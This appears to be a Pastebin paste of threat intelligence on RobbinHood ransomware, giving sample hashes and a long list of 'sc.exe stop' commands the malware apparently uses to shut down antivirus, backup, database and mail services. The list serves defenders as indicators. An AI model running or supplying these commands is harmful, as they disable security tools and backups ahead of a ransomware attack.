Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- https://twitter.com/joakimkennedy/status/1136262046780153856
- Can confirm that #RobbinHood does not use any exploits. Functions of the samples with the bitcoin addresses reported, attached. Kill a lot of AV products: (link: https://pastebin.com/3narnyr0) pastebin.com/3narnyr0
- 8c2a236877dd2b707c7b940276028e40
- d80a899168e859c4daea95b64f90645c
- 8c2a236877dd2b707c7b940276028e40
- cmd.exe /c sc.exe stop \"Acronis VSS Provider\" /y
- cmd.exe /c sc.exe stop \"Enterprise Client Service\" /y
- cmd.exe /c sc.exe stop \"Sophos Agent\" /y
- cmd.exe /c sc.exe stop \"Sophos AutoUpdate Service\" /y
- cmd.exe /c sc.exe stop \"Sophos Clean Service\" /y
- cmd.exe /c sc.exe stop \"Sophos Device Control Service\" /y
- cmd.exe /c sc.exe stop \"Sophos File Scanner Service\" /y
- cmd.exe /c sc.exe stop \"Sophos Health Service\" /y
- cmd.exe /c sc.exe stop \"Sophos MCS Agent\" /y
- cmd.exe /c sc.exe stop \"Sophos Message Router\" /y
- cmd.exe /c sc.exe stop \"Sophos Safestore Service\" /y
- cmd.exe /c sc.exe stop \"Sophos System Protection Service\" /y
- cmd.exe /c sc.exe stop \"Sophos Web Control Service\" /y
- cmd.exe /c sc.exe stop \"SQLsafe Backup Service\" /y
- cmd.exe /c sc.exe stop \"Symantec System Recovery\" /y
- cmd.exe /c sc.exe stop \"Veeam Backup Catalog Data Service\" /y
- cmd.exe /c sc.exe stop AcronisAgent /y
- cmd.exe /c sc.exe stop AcrSch2Svc /y
- cmd.exe /c sc.exe stop Antivirus /y
- cmd.exe /c sc.exe stop ARSM /y
- cmd.exe /c sc.exe stop BackupExecAgentAccelerator /y
- cmd.exe /c sc.exe stop BackupExecAgentBrowser /y
- cmd.exe /c sc.exe stop BackupExecDeviceMediaService /y
- cmd.exe /c sc.exe stop BackupExecJobEngine /y
- cmd.exe /c sc.exe stop BackupExecManagementService /y
- cmd.exe /c sc.exe stop BackupExecRPCService /y
- cmd.exe /c sc.exe stop BackupExecVSSProvider /y
- cmd.exe /c sc.exe stop bedbg /y
- cmd.exe /c sc.exe stop DCAgent /y
- cmd.exe /c sc.exe stop EPSecurityService /y
- cmd.exe /c sc.exe stop EPUpdateService /y
- cmd.exe /c sc.exe stop EraserSvc11710 /y
- cmd.exe /c sc.exe stop EsgShKernel /y
- cmd.exe /c sc.exe stop FA_Scheduler /y
- cmd.exe /c sc.exe stop IISAdmin /y
- cmd.exe /c sc.exe stop IMAP4Svc /y
- cmd.exe /c sc.exe stop macmnsvc /y
- cmd.exe /c sc.exe stop masvc /y
- cmd.exe /c sc.exe stop MBAMService /y
- cmd.exe /c sc.exe stop MBEndpointAgent /y
- cmd.exe /c sc.exe stop McAfeeEngineService /y
- cmd.exe /c sc.exe stop McAfeeFramework /y
- cmd.exe /c sc.exe stop McAfeeFrameworkMcAfeeFramework /y
- cmd.exe /c sc.exe stop McShield /y
- cmd.exe /c sc.exe stop McTaskManager /y
- cmd.exe /c sc.exe stop mfemms /y
- cmd.exe /c sc.exe stop mfevtp /y
- cmd.exe /c sc.exe stop MMS /y
- cmd.exe /c sc.exe stop mozyprobackup /y
- cmd.exe /c sc.exe stop MsDtsServer /y
- cmd.exe /c sc.exe stop MsDtsServer100 /y
- cmd.exe /c sc.exe stop MsDtsServer110 /y
- cmd.exe /c sc.exe stop MSExchangeES /y
- cmd.exe /c sc.exe stop MSExchangeIS /y
- cmd.exe /c sc.exe stop MSExchangeMGMT /y
- cmd.exe /c sc.exe stop MSExchangeMTA /y
- cmd.exe /c sc.exe stop MSExchangeSA /y
- cmd.exe /c sc.exe stop MSExchangeSRS /y
- cmd.exe /c sc.exe stop MSOLAP$SQL_2008 /y
- cmd.exe /c sc.exe stop MSOLAP$SYSTEM_BGC /y
- cmd.exe /c sc.exe stop MSOLAP$TPS /y
- cmd.exe /c sc.exe stop MSOLAP$TPSAMA /y
- cmd.exe /c sc.exe stop MSSQL$BKUPEXEC /y
- cmd.exe /c sc.exe stop MSSQL$ECWDB2 /y
- cmd.exe /c sc.exe stop MSSQL$PRACTICEMGT /y
- cmd.exe /c sc.exe stop MSSQL$PRACTTICEBGC /y
- cmd.exe /c sc.exe stop MSSQL$PROFXENGAGEMENT /y
- cmd.exe /c sc.exe stop MSSQL$SBSMONITORING /y
- cmd.exe /c sc.exe stop MSSQL$SHAREPOINT /y
- cmd.exe /c sc.exe stop MSSQL$SQL_2008 /y
- cmd.exe /c sc.exe stop MSSQL$SYSTEM_BGC /y
- cmd.exe /c sc.exe stop MSSQL$TPS /y
- cmd.exe /c sc.exe stop MSSQL$TPSAMA /y
- cmd.exe /c sc.exe stop MSSQL$VEEAMSQL2008R2 /y
- cmd.exe /c sc.exe stop MSSQL$VEEAMSQL2012 /y
- cmd.exe /c sc.exe stop MSSQLFDLauncher /y
- cmd.exe /c sc.exe stop MSSQLFDLauncher$PROFXENGAGEMENT /y
- cmd.exe /c sc.exe stop MSSQLFDLauncher$SBSMONITORING /y
- cmd.exe /c sc.exe stop MSSQLFDLauncher$SHAREPOINT /y
- cmd.exe /c sc.exe stop MSSQLFDLauncher$SQL_2008 /y
- cmd.exe /c sc.exe stop MSSQLFDLauncher$SYSTEM_BGC /y
- cmd.exe /c sc.exe stop MSSQLFDLauncher$TPS /y
- cmd.exe /c sc.exe stop MSSQLFDLauncher$TPSAMA /y
- cmd.exe /c sc.exe stop MSSQLSERVER /y
- cmd.exe /c sc.exe stop MSSQLServerADHelper100 /y
- cmd.exe /c sc.exe stop MSSQLServerOLAPService /y
- cmd.exe /c sc.exe stop MySQL80 /y
- cmd.exe /c sc.exe stop MySQL57 /y
- cmd.exe /c sc.exe stop ntrtscan /y
- cmd.exe /c sc.exe stop OracleClientCache80 /y
- cmd.exe /c sc.exe stop PDVFSService /y
- cmd.exe /c sc.exe stop POP3Svc /y
- cmd.exe /c sc.exe stop ReportServer /y
- cmd.exe /c sc.exe stop ReportServer$SQL_2008 /y
- cmd.exe /c sc.exe stop ReportServer$SYSTEM_BGC /y
- cmd.exe /c sc.exe stop ReportServer$TPS /y
- cmd.exe /c sc.exe stop ReportServer$TPSAMA /y
- cmd.exe /c sc.exe stop RESvc /y
- cmd.exe /c sc.exe stop sacsvr /y
- cmd.exe /c sc.exe stop SamSs /y
- cmd.exe /c sc.exe stop SAVAdminService /y
- cmd.exe /c sc.exe stop SAVService /y
- cmd.exe /c sc.exe stop SDRSVC /y
- cmd.exe /c sc.exe stop SepMasterService /y
- cmd.exe /c sc.exe stop ShMonitor /y
- cmd.exe /c sc.exe stop Smcinst /y
- cmd.exe /c sc.exe stop SmcService /y
- cmd.exe /c sc.exe stop SMTPSvc /y
- cmd.exe /c sc.exe stop SNAC /y
- cmd.exe /c sc.exe stop SntpService /y
- cmd.exe /c sc.exe stop sophossps /y
- cmd.exe /c sc.exe stop SQLAgent$BKUPEXEC /y
- cmd.exe /c sc.exe stop SQLAgent$ECWDB2 /y
- cmd.exe /c sc.exe stop SQLAgent$PRACTTICEBGC /y
- cmd.exe /c sc.exe stop SQLAgent$PRACTTICEMGT /y
- cmd.exe /c sc.exe stop SQLAgent$PROFXENGAGEMENT /y
- cmd.exe /c sc.exe stop SQLAgent$SBSMONITORING /y
- cmd.exe /c sc.exe stop SQLAgent$SHAREPOINT /y
- cmd.exe /c sc.exe stop SQLAgent$SQL_2008 /y
- cmd.exe /c sc.exe stop SQLAgent$SYSTEM_BGC /y
- cmd.exe /c sc.exe stop SQLAgent$TPS /y
- cmd.exe /c sc.exe stop SQLAgent$TPSAMA /y
- cmd.exe /c sc.exe stop SQLAgent$VEEAMSQL2008R2 /y
- cmd.exe /c sc.exe stop SQLAgent$VEEAMSQL2012 /y
- cmd.exe /c sc.exe stop SQLBrowser /y
- cmd.exe /c sc.exe stop SQLSafeOLRService /y
- cmd.exe /c sc.exe stop SQLSERVERAGENT /y
- cmd.exe /c sc.exe stop SQLTELEMETRY /y
- cmd.exe /c sc.exe stop SQLWriter /y
- cmd.exe /c sc.exe stop SstpSvc /y
- cmd.exe /c sc.exe stop svcGenericHost /y
- cmd.exe /c sc.exe stop swi_filter /y
- cmd.exe /c sc.exe stop swi_service /y
- cmd.exe /c sc.exe stop swi_update_64 /y
- cmd.exe /c sc.exe stop TmCCSF /y
- cmd.exe /c sc.exe stop tmlisten /y
- cmd.exe /c sc.exe stop TrueKey /y
- cmd.exe /c sc.exe stop TrueKeyScheduler /y
- cmd.exe /c sc.exe stop TrueKeyServiceHelper /y
- cmd.exe /c sc.exe stop UI0Detect /y
- cmd.exe /c sc.exe stop VeeamBackupSvc /y
- cmd.exe /c sc.exe stop VeeamBrokerSvc /y
- cmd.exe /c sc.exe stop VeeamCatalogSvc /y
- cmd.exe /c sc.exe stop VeeamCloudSvc /y
- cmd.exe /c sc.exe stop VeeamDeploymentService /y
- cmd.exe /c sc.exe stop VeeamDeploySvc /y
- cmd.exe /c sc.exe stop VeeamEnterpriseManagerSvc /y
- cmd.exe /c sc.exe stop VeeamMountSvc /y
- cmd.exe /c sc.exe stop VeeamNFSSvc /y
- cmd.exe /c sc.exe stop VeeamRESTSvc /y
- cmd.exe /c sc.exe stop VeeamTransportSvc /y
- cmd.exe /c sc.exe stop W3Svc /y
- cmd.exe /c sc.exe stop wbengine /y
- cmd.exe /c sc.exe stop WRSVC /y
- cmd.exe /c sc.exe stop MSSQL$VEEAMSQL2008R2 /y
- cmd.exe /c sc.exe stop SQLAgent$VEEAMSQL2008R2 /y
- cmd.exe /c sc.exe stop VeeamHvIntegrationSvc /y
- cmd.exe /c sc.exe stop swi_update /y
- cmd.exe /c sc.exe stop SQLAgent$CXDB /y
- cmd.exe /c sc.exe stop SQLAgent$CITRIX_METAFRAME /y
- cmd.exe /c sc.exe stop \"SQL Backups\" /y
- cmd.exe /c sc.exe stop MSSQL$PROD /y
- cmd.exe /c sc.exe stop \"Zoolz 2 Service\" /y
- cmd.exe /c sc.exe stop MSSQLServerADHelper /y
- cmd.exe /c sc.exe stop SQLAgent$PROD /y
- cmd.exe /c sc.exe stop msftesql$PROD /y
- cmd.exe /c sc.exe stop NetMsmqActivator /y
- cmd.exe /c sc.exe stop EhttpSrv /y
- cmd.exe /c sc.exe stop ekrn /y
- cmd.exe /c sc.exe stop ESHASRV /y
- cmd.exe /c sc.exe stop MSSQL$SOPHOS /y
- cmd.exe /c sc.exe stop SQLAgent$SOPHOS /y
- cmd.exe /c sc.exe stop AVP /y
- cmd.exe /c sc.exe stop klnagent /y
- cmd.exe /c sc.exe stop MSSQL$SQLEXPRESS /y
- cmd.exe /c sc.exe stop SQLAgent$SQLEXPRESS /y
- cmd.exe /c sc.exe stop wbengine /y
- cmd.exe /c sc.exe stop kavfsslp /y
- cmd.exe /c sc.exe stop KAVFSGT /y
- cmd.exe /c sc.exe stop KAVFS /y
- cmd.exe /c sc.exe stop mfefire /y
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement